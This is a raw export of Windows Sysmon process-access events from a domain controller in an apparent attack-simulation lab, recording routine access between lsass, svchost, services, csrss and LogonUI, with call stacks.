08:41:05.965{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1600-000000007F01}1620C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.965{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1600-000000007F01}1620C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.949{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.949{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0A00-000000007F01}856940C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1600-000000007F01}1620C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1600-000000007F01}1620C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0A00-000000007F01}8561128C:\Windows\system32\services.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1600-000000007F01}1620C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0A00-000000007F01}8561132C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1600-000000007F01}1620C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.933{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.918{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.887{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.887{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.871{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.871{5D479F2C-16A1-5F84-0C00-000000007F01}6121064C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.871{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 